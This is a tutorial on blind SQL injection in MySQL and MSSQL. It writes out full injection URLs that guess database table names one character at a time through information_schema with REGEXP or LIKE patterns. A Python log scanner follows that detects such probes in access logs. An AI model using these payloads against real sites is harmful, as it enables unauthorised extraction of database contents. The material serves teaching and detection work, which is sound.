----------------------------------------- MYSQL 5 + -----------------------------------------
We all know that in MySQL 5 and later, all database, table and field names are stored in the information_schema database. The usage is as follows:
1. Determine whether the first character of the first table name is in the range a-z. blind_sqli is a database name that is already known.
Note: in the regular expression, ^[a-z] means that the first character of the string is within the range a-z.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*
2. Determine whether the first character is in the range a-n.
www.2cto.com/index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3. Confirm that the character is n.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)/*
4. Extend the expression one character at a time, like this:
^n[a-z] -> ^ne[a-z] -> ^new[a-z] -> ^news[a-z] -> FALSE
At this point the table name is news. To verify it, check the regular expression ^news$; there is no need to test table_name='news' directly.
5. Other tables are then guessed the same way: only the offset in the LIMIT clause needs to change to run the blind injection against the following tables.
----------------------------------------------- MSSQL ---------------------------------------------------
MSSQL has no standard regular-expression operator; the pattern matching here uses the LIKE keyword instead.
default.asp?id=1 AND 1=(select top 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name LIKE '[a-z]%')
In this query, select top 1 1 is a combination: TOP 1 restricts the result to one row, and the trailing 1 is the constant that is selected.
Because MSSQL has no LIMIT x,1 like MySQL, the only way to query other table names is table_name not in (select top x table_name from information_schema.tables). The meaning is: the table name is not among the first x rows, so it is actually row x+1 that is being queried.
For example, to query the table name in the second row:
default.asp?id=1 AND 1=(select top 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name not in (select top 1 table_name FROM information_schema.tables) and table_name LIKE '[a-z]%')
Expression order:
n[a-z]% -> ne[a-z]% -> new[a-z]% -> news[a-z]% -> TRUE
After the expression news[a-z]% returns TRUE, remember that "%" matches 0 to n characters while "_" matches exactly one character. So, to check whether further characters follow, use the following expressions:
news% TRUE -> news_ FALSE
Similarly, fields and values can be obtained by the same method; I will not describe it in detail here.
PS: blind injection is laborious work, but I understand the principle. Programmers could consider implementing a tool for it!
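From the defender's side, the probe sequences above leave a very recognisable trail in web server logs: a subquery against information_schema whose table_name is tested with REGEXP or LIKE, repeated many times from one client with only the pattern literal changing. The following scanner is an added example, not code from the original article; the log format (source, method, URL) and the sample lines are constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (source, method, URL), not taken from the
# original article: three MySQL REGEXP probes from one client, one MSSQL LIKE
# probe from another, and a benign request.
SAMPLE_LOG = """\
10.0.0.5 GET /index.php?id=1+and+1%3D(SELECT+1+FROM+information_schema.tables+WHERE+TABLE_SCHEMA%3D%22blind_sqli%22+AND+table_name+REGEXP+%27%5E%5Ba-z%5D%27+LIMIT+0,1)/*
10.0.0.5 GET /index.php?id=1+and+1%3D(SELECT+1+FROM+information_schema.tables+WHERE+TABLE_SCHEMA%3D%22blind_sqli%22+AND+table_name+REGEXP+%27%5E%5Ba-n%5D%27+LIMIT+0,1)/*
10.0.0.5 GET /index.php?id=1+and+1%3D(SELECT+1+FROM+information_schema.tables+WHERE+TABLE_SCHEMA%3D%22blind_sqli%22+AND+table_name+REGEXP+%27%5En%27+LIMIT+0,1)/*
10.0.0.9 GET /default.asp?id=1+AND+1%3D(select+top+1+1+FROM+information_schema.tables+WHERE+table_name+LIKE+%27n%5Ba-z%5D%25%27)
10.0.0.7 GET /index.php?id=42
"""

# A subquery against information_schema whose table/column name is tested with
# REGEXP (MySQL) or LIKE (MSSQL) against a quoted pattern literal.
PROBE = re.compile(
    r"information_schema\.(?:tables|columns)\b.*?\b(regexp|like)\s*'([^']*)'",
    re.IGNORECASE | re.DOTALL)

def parse_line(line):
    """Split 'src method url' and URL-decode the query string."""
    src, _method, url = line.split(" ", 2)
    path, _, query = url.partition("?")
    return src, path, unquote_plus(query)

def find_probes(log_text):
    """One finding per request that probes information_schema with a pattern."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src, path, query = parse_line(line)
        m = PROBE.search(query)
        if m:
            hits.append({"src": src, "path": path, "op": m.group(1).upper(),
                         "pattern": m.group(2),
                         # a trailing /* or -- discards the rest of the real query
                         "comment_trunc": query.rstrip().endswith(("/*", "--"))})
    return hits

def enumeration_sources(hits, min_patterns=2):
    """(src, path) pairs that sent several probes differing only in the
    pattern: the per-character narrowing that blind enumeration relies on."""
    seen = defaultdict(set)
    for h in hits:
        seen[(h["src"], h["path"])].add(h["pattern"])
    return sorted(k for k, pats in seen.items() if len(pats) >= min_patterns)
```

A single hit may be a scanner or a false positive; enumeration_sources is the stronger signal, because the narrowing sequence needs many near-identical requests per table name, so it is also the right place to alert and rate-limit.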